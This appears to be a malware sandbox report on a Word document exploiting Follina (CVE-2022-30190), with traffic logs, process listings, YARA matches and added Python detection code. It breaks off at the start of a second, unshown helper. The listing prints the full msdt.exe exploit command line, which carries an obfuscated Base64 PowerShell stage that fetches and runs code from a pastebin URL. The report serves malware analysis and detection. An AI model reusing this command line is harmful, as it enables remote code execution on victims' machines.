                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482376099 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.842569113 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.873544931 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.873575926 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.875775099 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.875796080 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198750973 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198812008 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198883057 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198921919 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198940039 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198951960 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198959112 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.207793951 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.207868099 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.207993031 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.208487988 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.208515882 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.585951090 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.586105108 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.062576056 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.062618971 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.067028046 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.067059040 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.254457951 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.254626989 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255451918 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255502939 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255547047 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255574942 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256588936 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256633997 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256654978 CEST49749443192.168.2.4143.198.109.79
Aug 18, 2022 08:34:58.256697893 CEST  49749  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.405798912 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.405831099 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:58.405945063 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.406238079 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.406251907 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:58.766601086 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:58.766721964 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.767169952 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.767185926 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:58.771007061 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:58.771027088 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.122493982 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.122581959 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.122745037 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.122919083 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.122936010 CEST  443  49750  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.122951031 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.122992039 CEST  49750  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.311961889 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.311996937 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.312134027 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.312465906 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.312479973 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.667509079 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.667678118 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.668205023 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.668226957 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:34:59.672009945 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:34:59.672030926 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:00.015960932 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:00.016048908 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:00.016083956 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:00.016109943 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:00.016164064 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:00.016176939 CEST  443  49751  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:00.016194105 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:00.016231060 CEST  49751  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.578597069 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.578665018 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:04.578810930 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.579230070 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.579242945 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:04.949101925 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:04.949218988 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.949805021 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.949815035 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:04.956412077 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:04.956429005 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:05.315623999 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:05.315704107 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:05.315745115 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:05.315763950 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:05.315888882 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:05.315908909 CEST  443  49756  143.198.109.79  192.168.2.4
Aug 18, 2022 08:35:05.315932989 CEST  49756  443  192.168.2.4  143.198.109.79
Aug 18, 2022 08:35:05.315953016 CEST  49756  443  192.168.2.4  143.198.109.79
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Aug 18, 2022 08:34:46.991873026 CEST  58565  53  192.168.2.4  8.8.8.8
Aug 18, 2022 08:34:47.011255026 CEST  53  58565  8.8.8.8  192.168.2.4
Aug 18, 2022 08:34:52.362970114 CEST  56807  53  192.168.2.4  8.8.8.8
Aug 18, 2022 08:34:52.381969929 CEST  53  56807  8.8.8.8  192.168.2.4
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class
Aug 18, 2022 08:34:46.991873026 CEST  192.168.2.4  8.8.8.8  0x5398  Standard query (0)  www.malwarejake.com  A (IP address)  IN (0x0001)
Aug 18, 2022 08:34:52.362970114 CEST  192.168.2.4  8.8.8.8  0xc8e2  Standard query (0)  www.malwarejake.com  A (IP address)  IN (0x0001)
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class
Aug 18, 2022 08:34:47.011255026 CEST  8.8.8.8  192.168.2.4  0x5398  No error (0)  www.malwarejake.com  -  143.198.109.79  A (IP address)  IN (0x0001)
Aug 18, 2022 08:34:52.381969929 CEST  8.8.8.8  192.168.2.4  0xc8e2  No error (0)  www.malwarejake.com  -  143.198.109.79  A (IP address)  IN (0x0001)
• www.malwarejake.com
Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
0  192.168.2.4  49741  143.198.109.79  443  C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp  kBytes transferred  Direction  Data
2022-08-18 06:34:47 UTC  0  OUT  OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: www.malwarejake.com
2022-08-18 06:34:47 UTC  0  IN  HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Connection: close
Content-Type: text/html


Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
1  192.168.2.4  49742  143.198.109.79  443  C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp  kBytes transferred  Direction  Data
2022-08-18 06:34:48 UTC  0  OUT  HEAD /456.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: www.malwarejake.com
2022-08-18 06:34:48 UTC  0  IN  HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
10  192.168.2.4  49751  143.198.109.79  443  C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp  kBytes transferred  Direction  Data
2022-08-18 06:34:59 UTC  11  OUT  HEAD /456.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Connection: Keep-Alive
2022-08-18 06:35:00 UTC  11  IN  HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
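
The OPTIONS and HEAD exchanges in the sessions above are the traffic Word generates when it resolves a URL that the document carries as an external reference: an OPTIONS probe under the "Microsoft Office Word 2014" user agent, then repeated HEAD requests under "Microsoft Office Existence Discovery", all issued by WINWORD.EXE to a host that is not a Microsoft service. The Python below is an added detection example and is not part of the Joe Sandbox report or its tooling: it parses session records in the same Timestamp / kBytes transferred / Direction / Data layout (the sample text is constructed for the example, with single-space columns, and mirrors the requests shown above), flags Office probes to hosts outside an allowlist, and pairs each probe with the status of the response that followed so an analyst can see whether the referenced resource actually existed on the server. The allowlist suffixes, the record layout and the sample text are assumptions of the example, not facts taken from the report.

```python
"""Flag Office external-reference probes in flattened HTTP session records.

Added example; not part of the sandbox report. Record layout and the
trusted-host allowlist are assumptions of this example.
"""
import re
from dataclasses import dataclass, field

# One record per request/response: "<timestamp UTC> <kBytes> <IN|OUT> <first line>".
RECORD_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC)\s+(?P<kb>\d+)\s+(?P<dir>IN|OUT)\s+(?P<first>.+)$"
)
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/\d\.\d$")
STATUS_RE = re.compile(r"^HTTP/\d\.\d\s+(?P<status>\d{3})")

# User agents Word uses when it probes a URL referenced from a document
# (both appear in the sessions of the report).
OFFICE_PROBE_AGENTS = ("Microsoft Office Existence Discovery", "Microsoft Office Word")

# Hosts Office legitimately contacts. Assumed for this example; tune per environment.
TRUSTED_HOST_SUFFIXES = (".office.com", ".microsoft.com", ".live.com", ".sharepoint.com")


@dataclass
class Record:
    ts: str
    direction: str
    first_line: str
    headers: dict = field(default_factory=dict)


def parse_records(text):
    """Split session text into records; lines after a record line are its headers."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            records.append(Record(m["ts"], m["dir"], m["first"].strip()))
        elif records and ":" in line:
            name, _, value = line.partition(":")
            records[-1].headers[name.strip().lower()] = value.strip()
    return records


def is_trusted_host(host):
    """True when the Host header (port stripped) is in the assumed allowlist."""
    host = host.lower().split(":")[0]
    return any(host == s[1:] or host.endswith(s) for s in TRUSTED_HOST_SUFFIXES)


def find_office_probes(text):
    """Return one finding per Office-agent request to an untrusted host.

    Each finding carries the status of the IN record that follows the request,
    so a HEAD answered 200 (resource exists) is distinguishable from a 404.
    """
    records = parse_records(text)
    findings = []
    for i, rec in enumerate(records):
        if rec.direction != "OUT":
            continue
        req = REQUEST_RE.match(rec.first_line)
        if not req:
            continue
        ua = rec.headers.get("user-agent", "")
        host = rec.headers.get("host", "")
        if not any(ua.startswith(agent) for agent in OFFICE_PROBE_AGENTS):
            continue
        if not host or is_trusted_host(host):
            continue
        status = None
        if i + 1 < len(records) and records[i + 1].direction == "IN":
            sm = STATUS_RE.match(records[i + 1].first_line)
            status = int(sm["status"]) if sm else None
        findings.append({
            "timestamp": rec.ts,
            "method": req["method"],
            "url": f"//{host}{req['path']}",
            "user_agent": ua,
            "response_status": status,
            "note": "WebDAV/OPTIONS probe" if req["method"] == "OPTIONS"
                    else "existence check of external reference",
        })
    return findings


# Constructed sample in the assumed layout; the first two exchanges mirror the
# report's sessions, the third is a benign request to an allowlisted host.
SAMPLE_SESSIONS = """\
2022-08-18 06:34:47 UTC 0 OUT OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
Host: www.malwarejake.com
2022-08-18 06:34:47 UTC 0 IN HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
2022-08-18 06:34:59 UTC 11 OUT HEAD /456.html HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
2022-08-18 06:35:00 UTC 11 IN HTTP/1.1 200 OK
Content-Length: 7056
2022-08-18 06:36:10 UTC 12 OUT GET /metadata.xml HTTP/1.1
User-Agent: Microsoft Office Word 2014
Host: templates.office.com
2022-08-18 06:36:10 UTC 12 IN HTTP/1.1 200 OK
Content-Length: 10
"""

if __name__ == "__main__":
    for finding in find_office_probes(SAMPLE_SESSIONS):
        print(finding)
```

On the sample, the two requests to www.malwarejake.com are reported (OPTIONS, then HEAD /456.html answered 200 with a non-empty body) and the request to the allowlisted host is not; the same logic applied to proxy or sandbox logs surfaces the Word-to-external-host pattern before any payload is fetched.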


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:35:04 UTC | 12 | OUT | HEAD /456.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Connection: Keep-Alive
2022-08-18 06:35:05 UTC | 12 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:35:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:34:51 UTC | 0 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: www.malwarejake.com
2022-08-18 06:34:52 UTC | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Connection: close
Content-Type: text/html


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:34:52 UTC | 1 | OUT | GET /456.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: www.malwarejake.com
Connection: Keep-Alive
2022-08-18 06:34:53 UTC | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
2022-08-18 06:34:53 UTC | 1 | IN | Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:34:53 UTC | 8 | OUT | HEAD /456.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Connection: Keep-Alive
2022-08-18 06:34:54 UTC | 9 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:34:54 UTC | 9 | OUT | HEAD /456.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Connection: Keep-Alive
2022-08-18 06:34:54 UTC | 9 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:34:55 UTC | 9 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: www.malwarejake.com
2022-08-18 06:34:55 UTC | 9 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Connection: close
Content-Type: text/html


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:34:56 UTC | 10 | OUT | HEAD /456.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: www.malwarejake.com
2022-08-18 06:34:57 UTC | 10 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp: 2022-08-18 06:34:58 UTC | kBytes transferred: 10 | Direction: OUT
Data:
GET /456.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: www.malwarejake.com
If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
If-None-Match: "1b90-5e045198f8aaa"
Connection: Keep-Alive
Timestamp: 2022-08-18 06:34:58 UTC | kBytes transferred: 11 | Direction: IN
Data:
HTTP/1.1 304 Not Modified
Date: Thu, 18 Aug 2022 06:34:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Connection: close
ETag: "1b90-5e045198f8aaa"


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 143.198.109.79 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp: 2022-08-18 06:34:58 UTC | kBytes transferred: 11 | Direction: OUT
Data:
HEAD /456.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Connection: Keep-Alive
Timestamp: 2022-08-18 06:34:59 UTC | kBytes transferred: 11 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:34:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Target ID:0
Start time:08:34:39
Start date:18/08/2022
Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:0x1130000
File size:1937688 bytes
MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:08:34:46
Start date:18/08/2022
Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase:0xee0000
File size:466688 bytes
MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:5
Start time:08:35:00
Start date:18/08/2022
Path:C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Imagebase:0x1100000
File size:1508352 bytes
MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.619006579.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:moderate
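
The msdt.exe command line recorded for Target ID 5 is the Follina trigger itself: the IT_BrowseForFile parameter carries a PowerShell $( ... ) subexpression that Base64-decodes and runs a second stage, followed by a ../ path so that msdt resolves the parameter as a file. The Python below is an added triage helper, not part of the Joe Sandbox report and not Joe Security tooling. It takes that command line (copied from the listing above as its constructed sample), flags the indicators a detection engineer would key on, decodes the embedded Base64, and textually evaluates the PowerShell -f format expression so the next-stage command is readable. Function and indicator names are this example's own; only the Python standard library is used.

```python
"""Triage helper for a Follina-style msdt.exe command line.

Added example, not part of the Joe Sandbox report. The sample command line is
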